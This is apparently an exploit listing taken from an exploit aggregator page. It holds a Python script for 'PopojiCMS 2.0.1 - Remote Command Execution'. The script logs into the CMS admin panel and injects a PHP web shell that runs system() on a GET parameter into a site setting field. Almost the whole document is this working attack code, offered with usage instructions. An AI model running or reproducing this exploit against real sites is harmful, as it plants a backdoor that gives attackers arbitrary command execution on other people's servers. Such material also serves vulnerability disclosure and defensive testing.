Share
## https://sploitus.com/exploit?id=PACKETSTORM:178630
# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution  
# Date: 14/04/2024  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.popojicms.org/  
# Software Link:  
https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip  
# Version: Version : 2.0.1  
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS  
  
import requests  
import time  
import sys  
  
def exploit(url, username, password):  
  
login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"  
login_data = {"username": username, "password": password}  
headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f  
"{url}/po-admin/index.php"}  
session = requests.Session()  
login_response = session.post(login_url, data=login_data, headers=headers)  
if "Administrator PopojiCMS" in login_response.text:  
print("Login Successful!")  
time.sleep(1) # 1 saniye bekle  
else:  
print("Login Failed!")  
return  
  
edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"  
edit_data = {"meta_content": """<html>  
<body>  
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">  
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">  
<input type="SUBMIT" value="Execute">  
</form>  
<pre>  
<?php  
if(isset($_GET['cmd']))  
{  
system($_GET['cmd']);  
}  
?>  
</pre>  
</body>  
</html>"""}  
edit_response = session.post(edit_url, data=edit_data, headers=headers)  
if "cmd" in edit_response.text:  
print("Your shell is ready:", url)  
time.sleep(1)  
else:  
print("Exploit Failed!")  
return  
  
if __name__ == "__main__":  
if len(sys.argv) != 4:  
print("Kullanım: python exploit.py sitename username password")  
sys.exit(1)  
  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
print("Exploiting...")  
time.sleep(1)  
print("Logging in...")  
time.sleep(1)  
exploit(url, username, password)